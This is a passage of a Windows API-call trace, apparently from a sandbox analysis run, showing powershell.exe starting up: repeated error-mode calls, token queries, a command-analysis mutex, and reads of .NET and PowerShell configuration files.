lpOldMode=0xb156f8dc60) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.572] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0140.572] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e3510c91c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0140.572] CoTaskMemFree (pv=0x1e3510c91c0) [0140.574] CoTaskMemAlloc (cb=0x20c) returned 0x1e3510c91c0 [0140.574] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e3510c91c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0140.576] CoTaskMemFree (pv=0x1e3510c91c0) [0140.576] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8da10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0140.576] GetCurrentProcess () returned 0xffffffffffffffff [0140.576] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8dec8 | out: TokenHandle=0xb156f8dec8*=0x704) returned 1 [0140.576] GetTokenInformation (in: TokenHandle=0x704, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8dfc8 | out: TokenInformation=0x0, ReturnLength=0xb156f8dfc8) returned 0 [0140.576] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e351135bd0 [0140.576] GetTokenInformation (in: TokenHandle=0x704, TokenInformationClass=0x1, TokenInformation=0x1e351135bd0, TokenInformationLength=0x2c, ReturnLength=0xb156f8dfc8 | out: TokenInformation=0x1e351135bd0, ReturnLength=0xb156f8dfc8) returned 1 [0140.577] LocalFree (hMem=0x1e351135bd0) returned 0x0 [0140.579] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e3395025c0, cbSid=0xb156f8dfc0 | out: pSid=0x1e3395025c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8dfc0) returned 1 [0140.588] CreateMutexW (lpMutexAttributes=0x1e339502780, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x6fc [0140.595] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8de60*=0x6fc, lpdwindex=0xb156f8dc34 | out: lpdwindex=0xb156f8dc34) returned 0x0 [0140.860] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8d990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0140.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dde0) returned 1 [0140.860] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8dec0 | out: lpFileInformation=0xb156f8dec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0140.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dda0) returned 1 [0140.953] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f8d840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0140.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd20) returned 1 [0140.953] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x638 [0140.954] GetFileType (hFile=0x638) returned 0x1 [0140.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc90) returned 1 [0140.954] GetFileType (hFile=0x638) returned 0x1 [0141.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xb156f8c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0141.108] CoTaskMemAlloc (cb=0x20c) returned 0x1e351411830 [0141.108] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e351411830, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0141.109] CoTaskMemFree (pv=0x1e351411830) [0141.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0xb156f8c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0141.120] GetCurrentProcess () returned 0xffffffffffffffff [0141.120] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c6a8 | out: TokenHandle=0xb156f8c6a8*=0x6f8) returned 1 [0141.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0xb156f8c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0141.126] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c750 | out: lpFileInformation=0xb156f8c750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0141.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xb156f8c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0141.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c748 | out: lpFileInformation=0xb156f8c748*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0141.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xb156f8c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0141.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5c0) returned 1 [0141.141] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x708 [0141.141] GetFileType (hFile=0x708) returned 0x1 [0141.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c530) returned 1 [0141.141] GetFileType (hFile=0x708) returned 0x1 [0141.144] GetFileSize (in: hFile=0x708, lpFileSizeHigh=0xb156f8c698 | out: lpFileSizeHigh=0xb156f8c698*=0x0) returned 0x8c8f [0141.144] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c608, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c608*=0x1000, lpOverlapped=0x0) returned 1 [0141.152] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c3e8, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c3e8*=0x1000, lpOverlapped=0x0) returned 1 [0141.154] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c1d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c1d8*=0x1000, lpOverlapped=0x0) returned 1 [0141.154] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c1d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c1d8*=0x1000, lpOverlapped=0x0) returned 1 [0141.154] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c1d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c1d8*=0x1000, lpOverlapped=0x0) returned 1 [0141.155] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c098, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c098*=0x1000, lpOverlapped=0x0) returned 1 [0141.165] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c2d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c2d8*=0x1000, lpOverlapped=0x0) returned 1 [0141.168] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c188, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c188*=0x1000, lpOverlapped=0x0) returned 1 [0141.168] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c188, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c188*=0xc8f, lpOverlapped=0x0) returned 1 [0141.168] ReadFile (in: hFile=0x708, lpBuffer=0x1e339506fd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c2a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339506fd8*, lpNumberOfBytesRead=0xb156f8c2a8*=0x0, lpOverlapped=0x0) returned 1 [0141.172] CloseHandle (hObject=0x708) returned 1 [0141.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xb156f8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0141.174] CoTaskMemAlloc (cb=0x20c) returned 0x1e351410950 [0141.174] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e351410950, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0141.174] CoTaskMemFree (pv=0x1e351410950) [0141.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0xb156f8c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0141.176] GetCurrentProcess () returned 0xffffffffffffffff [0141.176] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c8d8 | out: TokenHandle=0xb156f8c8d8*=0x708) returned 1 [0141.179] GetCurrentProcess () returned 0xffffffffffffffff [0141.179] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c8d8 | out: TokenHandle=0xb156f8c8d8*=0x70c) returned 1 [0141.183] GetCurrentProcess () returned 0xffffffffffffffff [0141.183] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c6a8 | out: TokenHandle=0xb156f8c6a8*=0x710) returned 1 [0141.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c750 | out: lpFileInformation=0xb156f8c750*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xb156f8c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0141.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c748 | out: lpFileInformation=0xb156f8c748*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, 